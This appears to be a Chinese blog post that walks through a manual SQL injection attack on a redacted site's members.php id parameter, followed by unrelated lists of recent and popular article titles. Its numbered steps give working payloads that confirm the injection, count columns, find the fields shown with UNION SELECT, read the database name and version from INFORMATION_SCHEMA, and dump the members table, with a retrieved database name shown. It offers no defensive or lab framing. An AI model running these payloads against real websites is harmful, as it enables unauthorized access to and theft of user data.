0x1 判断注入点：

http://www.xxx.org/members.php?id=1 and 1=1 --+ # ture

http://www.xxx.org/members.php?id=1 and 1=2 --+ # fase

0x2 枚举当前的列

http://www.xxx.org/members.php?id=1 order by 5 #false

http://www.xxx.org/members.php?id=1 order by 4 $true

0x3 枚举当前字段，让其报错

http://www.xxx.org/members.php?id=-1 union select 1,2,3,4

0x4 获取当前数据库信息

http://www.xxx.org/members.php?id=-1 union select 1,database(),3,version()

database: db83231_asfaa

0x5 获取当前库的表

http://www.xxx.org/members.php?id=-1 +UNION+ALL+SELECT+1,2,3,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE())

0x6 获取members表的列

http://www.xxx.org/members.php?id=-1 +UNION+ALL+SELECT+1,2,3,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6d656d62657273)

0x7 获取字段数据

http://www.xxx.org/members.php?id=-1 +UNION+ALL+SELECT+1,2,3,(SELECT+GROUP_CONCAT(id,nome,imagem,texto+SEPARATOR+0x3c62723e)+FROM+members)

最新文章

1. css框架
2. 《DSP using MATLAB》示例Example5.8
3. php中创建和调用webservice接口示例
4. 【iCore3 双核心板_FPGA】例程六：计数器实验——计数器使用
5. LintCode "Delete Digits"
6. 关于C#中文本模板(.tt)的简单应用
7. ASP.NET中Json的处理
8. HDU 2510 - 符号三角形
9. JavaMail学习笔记（七）、帐号激活与忘记密码 实例(zhuan)
10. Android自己定义组件系列【5】——高级实践（1）
11. Matlab.NET混合编程调用Figure窗体
12. 细谈昆明SEO市场
13. 关于CSS的table-layout属性的用法详解
14. 剑指Offer——咪咕笔试题+知识点总结
15. ceph简单用户管理
16. ajax原生实现
17. python(leetcode)-重复元素算法题
18. windows server 2012 流媒体服务器搭建(直播与点播)
19. 151. Reverse Words in a String翻转一句话中的单词
20. Testing - 软件测试知识梳理 - 相关词汇

热门文章

1. ABP进阶教程9 - CSV导出中文乱码
2. Ubantu搭建虚拟环境
3. [PHP] PHP PDO与mysql的连接单例防止超时情况处理
4. [PHP] 配置vscode的语法检测消除提示Cannot validate since no PHP executable is set
5. Linux 登录 MySQL 报错, 解决bash: mysql: command not found 的方法
6. 【bzoj4006】[JLOI2015]管道连接（斯坦纳树+dp）
7. DRF的基本使用(一)
8. java（android）命名规范
9. Docker 简单发布dotnet core项目 图文版
10. Linux上error while loading shared libraries问题解决方法